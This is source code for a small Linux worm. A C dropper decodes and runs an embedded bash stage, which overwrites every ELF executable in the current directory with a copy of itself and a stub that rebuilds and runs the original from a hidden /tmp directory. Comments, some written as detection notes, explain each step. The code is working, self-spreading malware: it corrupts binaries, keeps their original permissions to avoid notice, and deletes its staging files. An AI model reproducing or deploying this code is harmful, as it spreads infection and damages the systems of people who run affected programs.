naive worm virus
#include <stdlib.h>
#include <stdio.h>
/* Second stage, stored as one string (its contents were removed from this page).
 * main() writes it verbatim to ".vimcr" and then pipes that file through
 * `base64 -d` and bash, so the string is expected to be base64 text of a
 * bash script. Detection note: the dropped ".vimcr"/".screencr" files in the
 * process's working directory are the observable artefacts of this stage. */
char payload[]="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";
/* Dropper entry point: writes the embedded payload to ".vimcr", decodes it
 * into ".screencr" via a shell command, runs it with /bin/bash, then unlinks
 * both files. Everything happens relative to the current working directory.
 * Non-standard `void main()` signature; no return value is reported to the
 * caller except the exit(1) on fopen failure. */
void main(){
/* Written but never read anywhere in this function. */
char cmd[3000]="/bin/bash";
/* Stage file in the cwd; silently exits if it cannot be created. */
FILE *f = fopen(".vimcr", "w");
if(f==NULL){exit(1);}
/* NOTE(review): payload is passed in the format-string position, so any
 * '%' sequences in it would be interpreted by fprintf rather than copied. */
fprintf(f, payload);
fclose(f);
/* Decode and execute the stage through the system shell; the decoded
 * script is left on disk as ".screencr" for the duration of the run. */
system("cat .vimcr| base64 -d > .screencr && /bin/bash .screencr");
/* Clean-up of the two on-disk artefacts; return values are ignored. */
unlink(".vimcr");
unlink(".screencr");
}
#!/bin/bash
# Bash stage of the sample. This is the script that gets prepended to every
# ELF file scanner() overwrites, so these globals travel with each copy.
# Debug verbosity; dbg() only prints when D > 0.
D=0
# Encoder/decoder commands used by enc_binary()/dec_binary().
# `-w 0` (no line wrapping) is a GNU coreutils option.
ENC="base64 -w 0"
DEC="base64 -d"
#######################################
# Debug logger: prints "[DEBUG] <tag>: <message>" to stderr when D > 0.
# Globals:   D (read)
# Arguments: $1 - message, $2 - tag (usually the calling function's name)
# Outputs:   one line on stderr, or nothing when D is 0
#######################################
function dbg ()
{
if [ $D -gt 0 ]; then
# $1 is intentionally left unquoted here, so it is word-split before echo.
echo "[DEBUG] $2: "$1 1>&2
fi
}
#######################################
# Prints a pseudo-random alphanumeric string of the requested length.
# Reads $len bytes from /dev/urandom, base64-encodes them, maps '/' and '+'
# to '0', and truncates to $len characters. scanner() uses it for the
# "/tmp/ssh-<suffix>" directory name written into each infected file.
# Arguments: $1 - length (defaults to 16 when empty)
# Outputs:   the string on stdout
#######################################
function random ()
{
if [ -z "$1" ]; then
len=16
else
len=$1
fi
# Not declared local: `len` and `_t` leak into the caller's scope.
_t=$(dd if=/dev/urandom of=/dev/stdout bs=$len count=1 2>/dev/null|base64|sed "s/[\/\+]/0/g")
echo ${_t:0:$len}
}
#######################################
# Prints the octal permission bits of a file (stat %a), or "0" when no path
# is given. stat's stderr is merged into the output, so an error message may
# be returned in place of a mode.
# Arguments: $1 - file path
# Outputs:   mode string on stdout
#######################################
function get_perm ()
{
if [ -z "$1" ]; then
dbg "No file path given" "get_perm"
echo 0
else
echo $(stat -c "%a" "$1" 2>&1)
fi
}
#######################################
# Applies a permission mode to a file with chmod. Echoes "2" when either
# argument is missing. Not referenced by any other visible function here;
# scanner() calls chmod directly instead.
# Arguments: $1 - mode, $2 - file path
# Outputs:   "2" on stdout when arguments are missing, else nothing
#######################################
function set_perm()
{
if [ -z "$1" ] || [ -z "$2" ]; then
dbg "No file path or no perm given" "set_perm"
echo 2
else
# chmod runs inside a command substitution; its (empty) output is then
# evaluated as a command, and its exit status is discarded.
$(chmod $1 "$2" 2>/dev/null)
fi
}
#######################################
# Prints the owner and group of a file as "USER:GROUP" (stat %U:%G), or "0"
# when no path is given. The dbg tag still says "get_perm" (copied from
# that function); stat's stderr is merged into stdout as in get_perm().
# Arguments: $1 - file path
# Outputs:   "owner:group" on stdout
#######################################
function get_ug ()
{
if [ -z "$1" ]; then
dbg "No file path given" "get_perm"
echo 0
else
echo $(stat -c "%U:%G" "$1" 2>&1)
fi
}
#######################################
# Prints the contents of a file as a single-line base64 string using $ENC.
# The encoded form is what scanner() embeds into the overwritten file.
# Globals:   ENC (read)
# Arguments: $1 - file path
# Outputs:   base64 text on stdout (stderr of the pipeline is merged in)
#######################################
function enc_binary ()
{
if [ -z "$1" ]; then
dbg "No file path given" "enc_binary"
else
echo $(cat "$1" |$ENC 2>&1)
fi
}
#######################################
# Decodes a base64 string with $DEC and writes the result to a file.
# Called from the lines scanner() appends to each infected file, where the
# decoded output is the original ELF placed under /tmp/ssh-<suffix>/.
# Globals:   DEC (read)
# Arguments: $1 - output file path, $2 - base64 text
# Outputs:   writes the decoded bytes to $1; decoder errors are discarded
#######################################
function dec_binary()
{
if [ -z "$1" ] || [ -z "$2" ]; then
dbg "No file path or encoded param given" "dec_binary"
else
echo $2| $DEC 2>/dev/null > "$1"
fi
}
#######################################
# Infection routine. For every entry directly under $1 that `file` reports
# as ELF (and that is not "./virus"), the file is replaced by: the first 103
# lines of the running script ($0), followed by a stub that recreates the
# original binary under /tmp/ssh-<random>/ and runs it. The original's
# owner/group and mode are then re-applied to the overwritten file.
# Detection notes grounded in this body: previously-ELF files that now start
# with "#!/bin/bash", and short-lived "/tmp/ssh-" directories created and
# removed around each execution of an infected program.
# Globals:   none written; reads $0
# Arguments: $1 - directory to scan (non-recursive glob "$1/*")
# Outputs:   dbg() lines on stderr when D > 0
#######################################
function scanner()
{
pth=$1
# Unquoted expansion: paths containing whitespace are split into separate words.
for f in $pth/*; do
dbg "found $f" scanner
# ELF check via `file` output; "./virus" is skipped (the sample's own name).
if [ ! -z $(file "$f" |grep -oE ELF) ] && ! [[ "$f" == "./virus" ]]; then
dbg "infecting $f" scanner
# Capture the original binary and its metadata before overwriting it.
_t=$(enc_binary "$f")
_perm=$(get_perm "$f")
_ug=$(get_ug "$f")
dbg "perm $_perm, ug $_ug" scanner
# Overwrite the target with the worm body (first 103 lines of this script).
head "$0" -n103 > "$f"
# Per-file temporary directory name, written into the target as a literal.
_td="/tmp/ssh-"$(random 10)
echo "mkdir $_td 2>/dev/null" >> "$f"
# Stub: decode the embedded original into $_td (named by basename here),
# restore its owner and mode, run it with the caller's arguments, then
# delete the directory. Lines below address the copy as "$_td/$f".
echo "dec_binary \"$_td/"$(basename "$f")"\" $_t" >> "$f"
echo "chown $_ug \"$_td/$f\" 2>/dev/null" >> "$f"
echo "chmod $_perm \"$_td/$f\" 2>/dev/null" >> "$f"
echo "\"$_td/$f\" \$@" >> "$f"
echo "rm -rf \"$_td\" 2>/dev/null" >> "$f"
#_t=$(enc_binary "$f")
#echo "echo $_t| $DEC |bash" > "$f"
# Re-apply the original owner/group and mode to the now-script file.
chown $_ug "$f" 2>/dev/null
chmod $_perm "$f" 2>/dev/null
fi
done
}
# Entry point: scan the current directory with all stderr (including dbg)
# suppressed, then print a message to stdout.
scanner . 2>/dev/null
echo You're doomed!